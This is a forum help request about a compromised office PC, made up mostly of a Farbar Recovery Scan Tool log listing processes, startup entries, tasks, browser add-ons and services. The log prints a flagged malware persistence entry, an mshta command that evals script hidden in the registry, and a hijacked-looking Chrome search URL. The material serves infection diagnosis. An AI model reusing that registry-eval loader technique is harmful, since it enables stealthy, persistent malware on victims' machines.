Big time issues. Virtual terminal hacked and Chrome pop-ups, --use-spdy=off and --disable-http2
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-10-2019
Ran by pmcstone (administrator) on OFFICE (ASUS All Series) (08-10-2019 19:52:29)
Running from C:\Users\pmcstone\Desktop
Loaded Profiles: pmcstone & QBDataServiceUser25 & (Available Profiles: pmcstone & QBDataServiceUser25 & QBDataServiceUser28 & QBDataServiceUser29)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intuit, Inc. -> SAP SE or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks 2019\QBDBMgrN.exe
(Intuit, Inc.) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2015\QBDBMgrN.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes Inc -> Malwarebytes) C:\Users\pmcstone\Downloads\adwcleaner_7.4.1.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Dynamic Code Publisher -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Dynamic Code Publisher -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8483032 2015-05-28] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1393880 2015-04-28] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [293872 2014-08-24] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [WSUpdater] => C:\PROGRAM FILES (X86)\UPS\WSTD\CF\WorldShipCF.exe [177848 2019-06-14] (United Parcel Service -> UPS)
HKLM-x32\...\Run: [NA1Messenger] => C:\PROGRAM FILES (X86)\UPS\WSTD\UPSNA1Msgr.exe [36536 2019-06-14] (United Parcel Service -> )
HKLM-x32\...\Run: [TeamsMachineUninstallerLocalAppData] => C:\Users\pmcstone\AppData\Local\Microsoft\Teams\Update.exe [1789552 2019-08-22] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKLM-x32\...\Run: [TeamsMachineUninstallerProgramData] => %ProgramData%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [eCCSchedulerService] => C:\Webgility\eCC\eCCSchedulerService.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [UnifySchedulerService] => C:\Webgility\UnifyEnterprise\UnifySchedulerService.exe [319128 2018-01-24] (WEBGILITY, INC. -> )
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-09-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [EhStters] => mshta "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\E1B85FAC-CCFC-BB11-DEA5-C01FF2A9 (the data entry has 51 more characters). <==== ATTENTION
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\MountPoints2: {d2d6eaf0-243d-11e6-b5b6-806e6f6e6963} - D:\.\Bin\ASSETUP.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [eCCSchedulerService] => C:\Webgility\eCC\eCCSchedulerService.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [UnifySchedulerService] => C:\Webgility\UnifyEnterprise\UnifySchedulerService.exe [319128 2018-01-24] (WEBGILITY, INC. -> )
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-09-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [EhStters] => mshta "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\E1B85FAC-CCFC-BB11-DEA5-C01FF2A9 (the data entry has 51 more characters). <==== ATTENTION
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\MountPoints2: {d2d6eaf0-243d-11e6-b5b6-806e6f6e6963} - D:\.\Bin\ASSETUP.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe [2019-09-24] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2019-04-15]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2019-04-15]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2019-04-15]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2019\QBW32.EXE (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip Messaging Utility.lnk [2019-08-22]
ShortcutTarget: UPS WorldShip Messaging Utility.lnk -> C:\Program Files (x86)\UPS\WSTD\WSTDMessaging.exe (United Parcel Service -> United Parcel Service, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip PLD Reminder Utility.lnk [2019-08-22]
ShortcutTarget: UPS WorldShip PLD Reminder Utility.lnk -> C:\Program Files (x86)\UPS\WSTD\wstdPldReminder.exe (United Parcel Service -> UPS)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {224ECC6F-85DB-4D54-A756-0284B1E85A2F} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {469FB42C-75CB-4C54-B841-44334C788FA4} - System32\Tasks\ASUS\i-Setup143054 => C:\Windows\MEI\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {4FDECFE4-E5A2-4BFA-B2E7-16A650F147CF} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {5BF85C5D-14F9-4EF2-840A-66D941A9A2EF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-07-26] (Google Inc -> Google Inc.)
Task: {5DE00BAE-01AD-436B-B882-5CDAEB679E85} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [272384 2017-11-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {6AEB0C80-8865-4ECA-9EC0-EB39E618FD3F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1236048 2019-07-24] (Adobe Inc. -> Adobe Systems)
Task: {73942233-FE39-475E-BAC1-C8249B947DE5} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2355832 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {8010BF0B-D68E-480F-9E76-CEBB1A52B5A7} - System32\Tasks\UPS WorldShip Updater => C:\PROGRAM FILES (X86)\UPS\WSTD\CF\WorldShipCF.exe [177848 2019-06-14] (United Parcel Service -> UPS)
Task: {994C86AD-A929-4B2C-88A0-4E25A107A029} - System32\Tasks\Microsoft\Windows\SystemRestore\SR => C:\Windows\system32\srtasks.exe
Task: {9C7201FC-8E9B-4DE4-8485-E1783BDFF8AC} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [27290216 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {A6AF9377-77CE-47AB-AD7D-EC32CAD0C82D} - System32\Tasks\Microsoft\Windows\Location\Notifications => C:\Windows\System32\LocationNotificationWindows.exe
Task: {AC4AF0DB-428D-455C-9C31-C0E80DC0B131} - System32\Tasks\AdwCleaner_onReboot => C:/Users/pmcstone/Downloads/adwcleaner_7.4.1.exe [7636680 2019-10-08] (Malwarebytes Inc -> Malwarebytes)
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {C02C4615-0751-4A73-831F-863B0C829EA2} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [163288 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {D1CB479B-C1E4-4D8B-B99B-5CE504115E7B} - System32\Tasks\QBScheduledReport => C:\Program Files (x86)\Common Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [389168 2019-06-07] (Intuit, Inc. -> Intuit Inc.)
Task: {D9193A65-FAAE-492E-B4B8-49027171B206} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [163288 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {DB04B796-54C4-48D3-ABC5-8ADC30726A6A} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2177176 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}
Task: {ED40600A-60C4-48AD-A5AC-4A9C16C2BB86} - System32\Tasks\ASUS\i-Setup142909 => C:\Windows\Install\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {EEFE293A-43D6-4B1B-8056-98907F8FA639} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [27290216 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {F6E74A55-46D9-4FD8-956B-7DBB02E1AB37} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2177176 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {F8697FD5-6953-432C-A55F-72243A1EBC19} - System32\Tasks\ASUS\i-Setup143719 => C:\Windows\Install\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Task: {FB3C354D-297A-4EB2-9B58-090F6361906B} - System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem => {927EA2AF-1C54-43D5-825E-0074CE028EEE}
Task: {FC555FFD-2617-4B63-8DDE-26BA3514E095} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-07-26] (Google Inc -> Google Inc.)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0664DE21-7F0E-45CB-803E-620129632885}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2019-06-26] (Microsoft Corporation -> Microsoft Corporation)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\Office16\URLREDIR.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Handler-x32: intu-help-qb11 - {5AFDE6E8-AD0F-450B-818F-21D1CDC2E3EE} - C:\Program Files (x86)\Intuit\QuickBooks 2018\HelpAsyncPluggableProtocol.dll [2018-07-14] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb12 - {665F2BD4-8216-400B-9706-865D2B771E27} - C:\Program Files (x86)\Intuit\QuickBooks 2019\HelpAsyncPluggableProtocol.dll [2019-06-07] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb8 - {CD17C364-2EC8-4929-91A9-C4839A20E909} - C:\Program Files (x86)\Intuit\QuickBooks 2015\HelpAsyncPluggableProtocol.dll [2018-02-28] (Intuit, Inc. -> Intuit, Inc.)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2010-11-20] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 1ohe3jp1.default
FF ProfilePath: C:\Users\pmcstone\AppData\Roaming\Mozilla\Firefox\Profiles\1ohe3jp1.default [2019-10-03]
FF Extension: (Open in Browser) - C:\Users\pmcstone\AppData\Roaming\Mozilla\Firefox\Profiles\1ohe3jp1.default\Extensions\[email protected] [2019-07-23]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-11-07] (Adobe Systems Incorporated -> )
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-06-26] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-11-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @glance.net/GlanceClient -> C:\Program Files (x86)\GlanceGuest\npglance.dll [2018-01-24] (Glance Networks Inc -> Glance Networks, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-03-20] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-03-20] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-09-30] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-09-30] (Google Inc -> Google LLC)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-07-31] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3260922531-1593714806-1494094557-1000: @ringcentral.com/RingCentralMeetingsPlugin -> C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\nprcmsplugin.dll [2017-08-22] (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FF Plugin HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926: @ringcentral.com/RingCentralMeetingsPlugin -> C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\nprcmsplugin.dll [2017-08-22] (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\pmcstone\AppData\Roaming\mozilla\plugins\npatgpc.dll [2018-12-11]
Chrome:
=======
CHR DefaultProfile: Default
CHR DefaultSearchURL: Default -> hxxps://cdn2.bigcommerce.com/server2900/0b6fe/product_images/favicon.ico
CHR Profile: C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default [2019-10-08]
CHR Extension: (Slides) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-04-19]
CHR Extension: (Docs) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-04-19]
CHR Extension: (Google Drive) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-05-28]
CHR Extension: (YouTube) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-05-28]
CHR Extension: (Adobe Acrobat) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-09-30]
CHR Extension: (Sheets) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-04-19]
CHR Extension: (Google Docs Offline) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-21]
CHR Extension: (Cisco Webex Extension) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2019-07-12]
CHR Extension: (PMC Stone | Intermac Machine Services...) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmheeecikjikcklhannabjimcjedjdp [2019-08-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Gmail) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-26]
CHR Extension: (Chrome Media Router) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-27]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11634696 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
S2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [240576 2013-10-06] (DTS, Inc. -> DTS, Inc)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1121\G2AC_Service.exe [310080 2017-08-14] (Citrix Online -> Citrix Online, a division of Citrix Systems, Inc.)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [344168 2015-05-06] (Intel Corporation - pGFX -> Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-28] (Canon Inc. -> )
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel® Trusted Connect Service -> Intel® Corporation)
